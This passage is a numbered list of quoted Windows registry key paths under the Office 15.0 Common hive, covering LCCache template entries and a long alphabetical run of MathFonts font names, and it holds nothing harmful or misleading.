1175. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851222",
1176. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851223",
1177. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851221",
1178. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851224",
1179. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851226",
1180. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851220",
1181. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851227",
1182. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851219",
1183. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851216",
1184. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851218",
1185. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851217",
1186. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851225",
1187. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM03998159",
1188. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328893",
1189. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM03998158",
1190. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328905",
1191. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Arial Unicode MS",
1192. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Batang",
1193. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@BatangChe",
1194. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@DFKai-SB",
1195. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Dotum",
1196. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@DotumChe",
1197. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@FangSong",
1198. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Gulim",
1199. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@GulimChe",
1200. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Gungsuh",
1201. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@GungsuhChe",
1202. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@KaiTi",
1203. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Malgun Gothic",
1204. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Meiryo",
1205. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Meiryo UI",
1206. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Microsoft JhengHei",
1207. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Microsoft JhengHei UI",
1208. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Microsoft YaHei",
1209. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Microsoft YaHei UI",
1210. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MingLiU",
1211. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MingLiU_HKSCS",
1212. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MingLiU_HKSCS-ExtB",
1213. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MingLiU-ExtB",
1214. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MS Gothic",
1215. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MS Mincho",
1216. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MS PGothic",
1217. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MS PMincho",
1218. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MS UI Gothic",
1219. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@NSimSun",
1220. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@PMingLiU",
1221. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@PMingLiU-ExtB",
1222. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@SimHei",
1223. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@SimSun",
1224. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@SimSun-ExtB",
1225. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Agency FB",
1226. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Aharoni",
1227. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Algerian",
1228. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Andalus",
1229. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Angsana New",
1230. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\AngsanaUPC",
1231. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Aparajita",
1232. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Arabic Typesetting",
1233. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Arial",
1234. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Arial Black",
1235. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Arial Narrow",
1236. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Arial Rounded MT Bold",
1237. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Arial Unicode MS",
1238. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Baskerville Old Face",
1239. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Batang",
1240. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\BatangChe",
1241. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bauhaus 93",
1242. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bell MT",
1243. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Berlin Sans FB",
1244. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Berlin Sans FB Demi",
1245. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bernard MT Condensed",
1246. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Blackadder ITC",
1247. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bodoni MT",
1248. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bodoni MT Black",
1249. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bodoni MT Condensed",
1250. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bodoni MT Poster Compressed",
1251. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Book Antiqua",
1252. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bookman Old Style",
1253. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bookshelf Symbol 7",
1254. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bradley Hand ITC",
1255. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Britannic Bold",
1256. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Broadway",
1257. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Browallia New",
1258. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\BrowalliaUPC",
1259. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Brush Script MT",
1260. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Calibri",
1261. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Calibri Light",
1262. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Californian FB",
1263. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Calisto MT",
1264. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Cambria",
1265. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Cambria Math",
1266. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Candara",
1267. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Castellar",
1268. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Centaur",
1269. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Century",
1270. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Century Gothic",
1271. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Century Schoolbook",
1272. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Chiller",
1273. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Colonna MT",
1274. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Comic Sans MS",
1275. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Consolas",
1276. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Constantia",
1277. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Cooper Black",
1278. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Copperplate Gothic Bold",
1279. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Copperplate Gothic Light",
1280. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Corbel",
1281. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Cordia New",
1282. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\CordiaUPC",
1283. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Courier New",
1284. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Curlz MT",
1285. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\DaunPenh",
1286. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\David",
1287. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\DFKai-SB",
1288. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\DilleniaUPC",
1289. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\DokChampa",
1290. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Dotum",
1291. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\DotumChe",
1292. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Ebrima",
1293. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Edwardian Script ITC",
1294. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Elephant",
1295. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Engravers MT",
1296. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Eras Bold ITC",
1297. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Eras Demi ITC",
1298. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Eras Light ITC",
1299. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Eras Medium ITC",
1300. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Estrangelo Edessa",
1301. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\EucrosiaUPC",
1302. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Euphemia",
1303. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\FangSong",
1304. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Felix Titling",
1305. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Footlight MT Light",
1306. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Forte",
1307. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Franklin Gothic Book",
1308. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Franklin Gothic Demi",
1309. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Franklin Gothic Demi Cond",
1310. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Franklin Gothic Heavy",
1311. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Franklin Gothic Medium",
1312. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Franklin Gothic Medium Cond",
1313. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\FrankRuehl",
1314. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\FreesiaUPC",
1315. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Freestyle Script",
1316. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\French Script MT",
1317. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gabriola",
1318. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gadugi",
1319. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Garamond",
1320. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gautami",
1321. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Georgia",
1322. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gigi",
1323. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gill Sans MT",
1324. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gill Sans MT Condensed",
1325. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gill Sans MT Ext Condensed Bold",
1326. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gill Sans Ultra Bold",
1327. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gill Sans Ultra Bold Condensed",
1328. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gisha",
1329. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gloucester MT Extra Condensed",
1330. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Goudy Old Style",
1331. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Goudy Stout",
1332. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gulim",
1333. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\GulimChe",
1334. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gungsuh",
1335. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\GungsuhChe",
1336. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Haettenschweiler",
1337. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Harlow Solid Italic",
1338. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Harrington",
1339. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\High Tower Text",
1340. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Impact",
1341. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Imprint MT Shadow",
1342. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Informal Roman",
1343. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\IrisUPC",
1344. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Iskoola Pota",
1345. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\JasmineUPC",
1346. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Jokerman",
1347. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Juice ITC",
1348. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\KaiTi",
1349. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Kalinga",
1350. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Kartika",
1351. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Khmer UI",
1352. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\KodchiangUPC",
1353. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Kokila",
1354. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Kristen ITC",
1355. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Kunstler Script",
1356. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lao UI",
1357. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Latha",
1358. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Leelawadee",
1359. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Levenim MT",
1360. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\LilyUPC",
1361. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Bright",
1362. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Calligraphy",
1363. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Console",
1364. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Fax",
1365. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Handwriting",
1366. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Sans",
1367. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Sans Typewriter",
1368. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Sans Unicode",
1369. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Magneto",
1370. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Maiandra GD",
1371. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Malgun Gothic",
1372. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Mangal",
1373. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Marlett",
1374. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Matura MT Script Capitals",
1375. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Meiryo",
1376. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Meiryo UI",
1377. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft Himalaya",
1378. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft JhengHei",
1379. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft JhengHei UI",
1380. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft New Tai Lue",
1381. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft PhagsPa",
1382. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft Sans Serif",
1383. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft Tai Le",
1384. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft Uighur",
1385. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft YaHei",
1386. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft YaHei UI",
1387. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft Yi Baiti",
1388. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MingLiU",
1389. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MingLiU_HKSCS",
1390. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MingLiU_HKSCS-ExtB",
1391. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MingLiU-ExtB",
1392. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Miriam",
1393. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Miriam Fixed",
1394. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Mistral",
1395. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Modern No. 20",
1396. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Mongolian Baiti",
1397. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Monotype Corsiva",
1398. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MoolBoran",
1399. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS Gothic",
1400. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS Mincho",
1401. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS Outlook",
1402. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS PGothic",
1403. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS PMincho",
1404. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS Reference Sans Serif",
1405. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS Reference Specialty",
1406. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS UI Gothic",
1407. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MT Extra",
1408. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MV Boli",
1409. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Narkisim",
1410. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Niagara Engraved",
1411. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Niagara Solid",
1412. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Nirmala UI",
1413. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\NSimSun",
1414. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Nyala",
1415. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\OCR A Extended",
1416. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Old English Text MT",
1417. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Onyx",
1418. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Palace Script MT",
1419. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Palatino Linotype",
1420. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Papyrus",
1421. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Parchment",
1422. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Perpetua",
1423. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Perpetua Titling MT",
1424. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Plantagenet Cherokee",
